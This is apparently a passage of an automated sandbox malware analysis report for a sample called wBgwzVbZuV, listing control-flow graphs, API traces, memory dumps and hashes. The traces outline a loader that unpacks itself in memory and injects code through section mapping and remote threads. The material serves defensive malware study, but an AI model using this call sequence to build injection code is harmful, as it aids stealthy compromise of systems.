                                                              • LoadLibraryA.KERNELBASE(004173E8), ref: 00415E32
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00415E84
                                                              • GetFileAttributesA.KERNEL32(004173F4), ref: 00415EB7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
                                                              • String ID: k`$}$
                                                              • API String ID: 723190256-956986773
                                                              • Opcode ID: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
                                                              • Instruction ID: 59ac31373c954154000cefc7af6afdb20c2223af4aecfae594a4346f9e797540
                                                              • Opcode Fuzzy Hash: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
                                                              • Instruction Fuzzy Hash: 97A1C171941624DFC724DB61EC48EDB7B79EF8D340F4180AAF609A7250DB385A81CFA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 150 401514-401533 152 401524-40152f 150->152 153 401536-40156e call 401193 150->153 152->153 162 401570 153->162 163 401573-401578 153->163 162->163 165 401898-4018a0 163->165 166 40157e-40158f 163->166 165->163 169 4018a5-4018b7 165->169 170 401595-4015be 166->170 171 401896 166->171 177 4018c5 169->177 178 4018bc-4018e3 call 401193 169->178 170->171 179 4015c4-4015db NtDuplicateObject 170->179 171->169 177->178 179->171 181 4015e1-401605 NtCreateSection 179->181 183 401661-401687 NtCreateSection 181->183 184 401607-401628 NtMapViewOfSection 181->184 183->171 188 40168d-401691 183->188 184->183 186 40162a-401646 NtMapViewOfSection 184->186 186->183 189 401648-40165e 186->189 188->171 191 401697-4016b8 NtMapViewOfSection 188->191 189->183 191->171 193 4016be-4016da NtMapViewOfSection 191->193 193->171 195 4016e0 call 4016e5 193->195
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 197 4014fe-401503 198 401531-40156e call 401193 197->198 199 401506-401511 197->199 209 401570 198->209 210 401573-401578 198->210 209->210 212 401898-4018a0 210->212 213 40157e-40158f 210->213 212->210 216 4018a5-4018b7 212->216 217 401595-4015be 213->217 218 401896 213->218 224 4018c5 216->224 225 4018bc-4018e3 call 401193 216->225 217->218 226 4015c4-4015db NtDuplicateObject 217->226 218->216 224->225 226->218 228 4015e1-401605 NtCreateSection 226->228 230 401661-401687 NtCreateSection 228->230 231 401607-401628 NtMapViewOfSection 228->231 230->218 235 40168d-401691 230->235 231->230 233 40162a-401646 NtMapViewOfSection 231->233 233->230 236 401648-40165e 233->236 235->218 238 401697-4016b8 NtMapViewOfSection 235->238 236->230 238->218 240 4016be-4016da NtMapViewOfSection 238->240 240->218 242 4016e0 call 4016e5 240->242
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 244 401542-40156e call 401193 253 401570 244->253 254 401573-401578 244->254 253->254 256 401898-4018a0 254->256 257 40157e-40158f 254->257 256->254 260 4018a5-4018b7 256->260 261 401595-4015be 257->261 262 401896 257->262 268 4018c5 260->268 269 4018bc-4018e3 call 401193 260->269 261->262 270 4015c4-4015db NtDuplicateObject 261->270 262->260 268->269 270->262 272 4015e1-401605 NtCreateSection 270->272 274 401661-401687 NtCreateSection 272->274 275 401607-401628 NtMapViewOfSection 272->275 274->262 279 40168d-401691 274->279 275->274 277 40162a-401646 NtMapViewOfSection 275->277 277->274 280 401648-40165e 277->280 279->262 282 401697-4016b8 NtMapViewOfSection 279->282 280->274 282->262 284 4016be-4016da NtMapViewOfSection 282->284 284->262 286 4016e0 call 4016e5 284->286
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 288 401549-40156e call 401193 292 401570 288->292 293 401573-401578 288->293 292->293 295 401898-4018a0 293->295 296 40157e-40158f 293->296 295->293 299 4018a5-4018b7 295->299 300 401595-4015be 296->300 301 401896 296->301 307 4018c5 299->307 308 4018bc-4018e3 call 401193 299->308 300->301 309 4015c4-4015db NtDuplicateObject 300->309 301->299 307->308 309->301 311 4015e1-401605 NtCreateSection 309->311 313 401661-401687 NtCreateSection 311->313 314 401607-401628 NtMapViewOfSection 311->314 313->301 318 40168d-401691 313->318 314->313 316 40162a-401646 NtMapViewOfSection 314->316 316->313 319 401648-40165e 316->319 318->301 321 401697-4016b8 NtMapViewOfSection 318->321 319->313 321->301 323 4016be-4016da NtMapViewOfSection 321->323 323->301 325 4016e0 call 4016e5 323->325
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 327 401557 328 40155b-40156e call 401193 327->328 329 40154f-401554 327->329 332 401570 328->332 333 401573-401578 328->333 329->328 332->333 335 401898-4018a0 333->335 336 40157e-40158f 333->336 335->333 339 4018a5-4018b7 335->339 340 401595-4015be 336->340 341 401896 336->341 347 4018c5 339->347 348 4018bc-4018e3 call 401193 339->348 340->341 349 4015c4-4015db NtDuplicateObject 340->349 341->339 347->348 349->341 351 4015e1-401605 NtCreateSection 349->351 353 401661-401687 NtCreateSection 351->353 354 401607-401628 NtMapViewOfSection 351->354 353->341 358 40168d-401691 353->358 354->353 356 40162a-401646 NtMapViewOfSection 354->356 356->353 359 401648-40165e 356->359 358->341 361 401697-4016b8 NtMapViewOfSection 358->361 359->353 361->341 363 4016be-4016da NtMapViewOfSection 361->363 363->341 365 4016e0 call 4016e5 363->365
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 368 402f97-402fbb 369 402fc1-402fd9 368->369 370 4030ee-4030f3 368->370 369->370 371 402fdf-402ff0 369->371 372 402ff2-402ffb 371->372 373 403000-40300e 372->373 373->373 374 403010-403017 373->374 375 403039-403040 374->375 376 403019-403038 374->376 377 403062-403065 375->377 378 403042-403061 375->378 376->375 379 403067-40306a 377->379 380 40306e 377->380 378->377 379->380 381 40306c 379->381 380->372 382 403070-403075 380->382 381->382 382->370 383 403077-40307a 382->383 383->370 384 40307c-4030eb RtlCreateUserThread NtTerminateProcess 383->384 384->370
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1921587553-0
                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 385 2dfa8a7-2dfa8c0 386 2dfa8c2-2dfa8c4 385->386 387 2dfa8cb-2dfa8d7 CreateToolhelp32Snapshot 386->387 388 2dfa8c6 386->388 389 2dfa8d9-2dfa8df 387->389 390 2dfa8e7-2dfa8f4 Module32First 387->390 388->387 389->390 395 2dfa8e1-2dfa8e5 389->395 391 2dfa8fd-2dfa905 390->391 392 2dfa8f6-2dfa8f7 call 2dfa566 390->392 396 2dfa8fc 392->396 395->386 395->390 396->391
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DFA8CF
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02DFA8EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DF7000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2df7000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: ef48994b9da0f4adb225bce54405f71fce5137213b79ca4e73999253d25cd01a
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: CAF09632200715ABD7603BF5DC8CB6E77E8EF49624F110529E74B916C0DBB0EC468AA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 65 2c3003c-2c30047 66 2c30049 65->66 67 2c3004c-2c30263 call 2c30a3f call 2c30e0f call 2c30d90 VirtualAlloc 65->67 66->67 82 2c30265-2c30289 call 2c30a69 67->82 83 2c3028b-2c30292 67->83 88 2c302ce-2c303c2 VirtualProtect call 2c30cce call 2c30ce7 82->88 85 2c302a1-2c302b0 83->85 87 2c302b2-2c302cc 85->87 85->88 87->85 94 2c303d1-2c303e0 88->94 95 2c303e2-2c30437 call 2c30ce7 94->95 96 2c30439-2c304b8 VirtualFree 94->96 95->94 97 2c305f4-2c305fe 96->97 98 2c304be-2c304cd 96->98 101 2c30604-2c3060d 97->101 102 2c3077f-2c30789 97->102 100 2c304d3-2c304dd 98->100 100->97 105 2c304e3-2c30505 100->105 101->102 108 2c30613-2c30637 101->108 106 2c307a6-2c307b0 102->106 107 2c3078b-2c307a3 102->107 116 2c30517-2c30520 105->116 117 2c30507-2c30515 105->117 109 2c307b6-2c307cb 106->109 110 2c3086e-2c308be LoadLibraryA 106->110 107->106 111 2c3063e-2c30648 108->111 113 2c307d2-2c307d5 109->113 115 2c308c7-2c308f9 110->115 111->102 114 2c3064e-2c3065a 111->114 118 2c307d7-2c307e0 113->118 119 2c30824-2c30833 113->119 114->102 120 2c30660-2c3066a 114->120 121 2c30902-2c3091d 115->121 122 2c308fb-2c30901 115->122 123 2c30526-2c30547 116->123 117->123 124 2c307e2 118->124 125 2c307e4-2c30822 118->125 127 2c30839-2c3083c 119->127 126 2c3067a-2c30689 120->126 122->121 128 2c3054d-2c30550 123->128 124->119 125->113 129 2c30750-2c3077a 126->129 130 2c3068f-2c306b2 126->130 127->110 131 2c3083e-2c30847 127->131 133 2c305e0-2c305ef 128->133 134 2c30556-2c3056b 128->134 129->111 135 2c306b4-2c306ed 130->135 136 2c306ef-2c306fc 130->136 137 2c3084b-2c3086c 131->137 138 2c30849 131->138 133->100 141 2c3056f-2c3057a 134->141 142 2c3056d 134->142 135->136 139 2c3074b 136->139 140 2c306fe-2c30748 136->140 137->127 138->110 139->126 140->139 145 2c3059b-2c305bb 141->145 146 2c3057c-2c30599 141->146 142->133 149 2c305bd-2c305db 145->149 146->149 149->128
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C3024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: fd138f845daf221564a553f87e6ae7a9839ede97e432baf425e83feb7a45334c
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 14527975A00229DFDB65CF58C984BACBBB1BF09304F1484D9E90DAB351DB30AA85CF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 367 4157a0-4158e0 GetModuleHandleW GetProcAddress VirtualProtect
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041587F
                                                              • GetProcAddress.KERNEL32(00000000,00419CC8), ref: 004158BC
                                                              • VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 004158DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-3916222277
                                                              • Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
                                                              • Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 398 2c30e0f-2c30e24 SetErrorMode * 2 399 2c30e26 398->399 400 2c30e2b-2c30e2c 398->400 399->400
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02C30223,?,?), ref: 02C30E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02C30223,?,?), ref: 02C30E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: 620753ad965f63d69eadd59c880b602f741d140fbda77ca14c4d9ac3ebe426c0
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 3DD01232245228B7DB013A94DC09BCEBB5CDF09BA6F008421FB0DE9080CBB09A4046EA

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 401 4018e6-40194b call 401193 Sleep call 40141f 415 40195a-4019a5 call 401193 401->415 416 40194d-401955 call 401514 401->416 416->415
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 430 401915-401918 431 4018c6-4018c7 430->431 432 40191a-40194b call 401193 Sleep call 40141f 430->432 433 4018d7 431->433 434 4018ce-4018e3 call 401193 431->434 444 40195a-4019a5 call 401193 432->444 445 40194d-401955 call 401514 432->445 433->434 445->444
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 459 4018f1-40194b call 401193 Sleep call 40141f 469 40195a-4019a5 call 401193 459->469 470 40194d-401955 call 401514 459->470 470->469
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 484 401912-40194b call 401193 Sleep call 40141f 495 40195a-4019a5 call 401193 484->495 496 40194d-401955 call 401514 484->496 496->495
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                              APIs
